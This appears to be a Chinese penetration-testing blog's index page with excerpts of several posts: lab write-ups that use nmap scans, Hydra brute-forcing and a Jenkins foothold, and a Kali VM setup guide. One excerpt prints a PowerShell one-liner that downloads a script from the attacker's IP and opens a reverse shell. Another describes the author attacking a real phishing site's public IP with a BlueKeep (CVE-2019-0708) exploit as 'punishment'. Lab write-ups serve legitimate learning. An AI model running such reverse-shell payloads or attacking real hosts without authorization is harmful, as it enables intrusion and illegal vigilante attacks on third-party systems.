MikannseのSekai

端口扫描sudo nmap –min-rate 10000 -p- 10.10.116.243 -Pn 扫描全部端口，设置最小速度为10000 sudo nmap -sT -sV -O -p80,3389 10.10.116.243 -Pn 对指定的端口用TCP协议扫描，扫描版本号和操作系统 Web登录网站 要求得到小丑的名字，直接百度识图，是一部电影，主角叫Pennywise 爆破密码根据THM提示，在登录界面用Hydra爆破密码，账户名猜测为admin 在这之前用bp抓个包，随便输入1 1 将__VIEWSTATE到”Login+in”作为表单数据，Login failed为报错信息（在输入错误的用户名密码搭配时的提示错误信息） 表单路径为/Account/login.aspx 于是最终命令为(字典随便选了一个)： sudo hydra -l admin -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top1000.txt 10.10.116.243 http-post-form "/Accoun ...

Initial Accessnmap扫描端口 浏览器访问8080端口的web服务，发现是一个Jenkins CMS 尝试admin admin 成功登录 也可以用hydra爆破,这里贴一张网上的WP图 稍微在网上搜索下这个比较经典的CMS，就可以知道这有个页面可以上我们RCE https://github.com/samratashok/nishang 利用这其中的Invoke-PowerShellTcp.ps1来进行反向shell 在本地开启Python服务来让靶机下载我们的shell,开启nc来监听反向shell 在靶机上，用powershell脚本来进行反向shell的下载与连接，IP为自己攻击机的IP， powershell iex (New-Object Net.WebClient).DownloadString(‘http://10.17.49.170:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.49.170 -Port 1234 apply,s ...

碎碎念也算小学了几个月的渗透，没想到碰上了钓鱼邮件，这不得练练实战,狠狠得惩罚他( 信息搜集进入网站之后，发现是个QQ邮箱界面,当然看网址就一眼假 先通过ping得到他的真实IP， https://ping.chinaz.com 是38.55.193.233准没错了 拿nmap狠狠地扫他 发现开启了80和3389两个端口,80端口比较平常，试着搜一下ms-wbt-server这个服务，发现了这个文章，竟然有CVE，是windows平台的 https://blog.csdn.net/s619782146/article/details/125540370 通过这个插件可以知道，主机的操作系统也确实是windows，这下可精神了。 开搞尝试搜索CVE-2019-0708，是一个RCE漏洞 打开我们的msf search 0708 先扫描是否真的存在漏铜，所以 use 0 show options，要设置目标的主机 于是:set RHOSTS 38.55.193.233 run 发现存在漏洞！ 下载POC https://github.com/n1xbyte/CVE-2019 ...

跟着CSDN某不良文章操作后kali崩了(恼，又没保存快照。要养成经常保存快照的习惯。在重装的过程中随手水下第一篇博客。 镜像下载下载kali linux镜像，我这里选择23年2月的最新版 https://www.kali.org/ 创建虚拟机 选择Debian 8.x 64(kali基于Debian) 选择虚拟机创建路径，建议放在空间较大的地方 这里根据自己宿主机的内核总数来选，理论上只要小于宿主机内核总数就好，我这里选2+2。 打开任务管理器，打开“性能”。我的是16个逻辑处理器，所以理论上小于16就好（这块还不太懂） 内存根据自己宿主机来选，推荐4G以上，我记得John爆破需要至少4G的内存 选择存储为单个文件，选择磁盘大小，我这里选择100G。建议选大些，可以省去以后扩容磁盘的麻烦（不过学一下还是有必要的）。之前选20G实在是不够用，后面又扩容了。 像打印机这种没什么用的可以移除，然后新CD/DVD，选择下好的kali镜像文件 发现虚拟机已经创建好了，虚拟机的名称可以自己重命名。开启虚拟机。 安装 选择第一个图形化安装，回车 语言自行选 ...